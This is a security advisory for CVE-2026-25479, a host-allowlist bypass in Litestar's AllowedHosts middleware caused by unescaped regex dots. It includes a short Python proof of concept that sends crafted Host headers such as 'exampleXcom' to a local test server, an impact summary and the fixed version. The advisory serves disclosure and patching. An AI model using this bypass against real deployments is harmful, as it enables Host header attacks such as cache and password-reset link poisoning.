CVE-2026-25479
Litestar's AllowedHosts has a validation bypass due to unescaped regex metacharacters in configured host patterns
Description
### Summary AllowedHosts host validation can be bypassed because configured host patterns are turned into regular expressions without escaping regex metacharacters (notably .). A configured allowlist entry like example.com can match exampleXcom ### Details In litestar.middleware.allowed_hosts, allowlist entries are compiled into regex patterns in a way that allows regex metacharacters to retain special meaning (e.g., . matches any character). This enables a bypass where an attacker supplies a host that matches the regex but is not the intended literal hostname. ### PoC Server (poc_allowed_hosts_server.py) ``` from litestar import Litestar, get from litestar.middleware.allowed_hosts import AllowedHostsConfig @get("/") async def index() -> str: return "ok" config = AllowedHostsConfig(allowed_hosts=["example.com"]) app = Litestar([index], allowed_hosts_config=config) ``` `uvicorn poc_allowed_hosts_server:app --host 127.0.0.1 --port 8001` Client (poc_allowed_hosts_client.py) ``` import http.client def req(host_header: str) -> tuple[int, bytes]: c = http.client.HTTPConnection("127.0.0.1", 8001, timeout=3) c.request("GET", "/", headers={"Host": host_header}) r = c.getresponse() body = r.read() c.close() return r.status, body print("evil.com:", *req("evil.com")) print("exampleXcom:", *req("exampleXcom")) ``` Expected (vulnerable behavior): Host: evil.com → 400 invalid host Host: exampleXcom → 200 ok (bypass) ### Impact Type: security control bypass (host allowlist) Who is impacted: apps relying on AllowedHosts to prevent Host header attacks (cache poisoning, absolute URL construction abuse, password reset link poisoning, etc.). The downstream impact depends on app behavior, but the bypass defeats a core mitigation layer.
How to fix CVE-2026-25479
To remediate CVE-2026-25479, upgrade the affected package to a fixed version below.
- —upgrade to 2.20.0 or later
Is CVE-2026-25479 being exploited?
Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.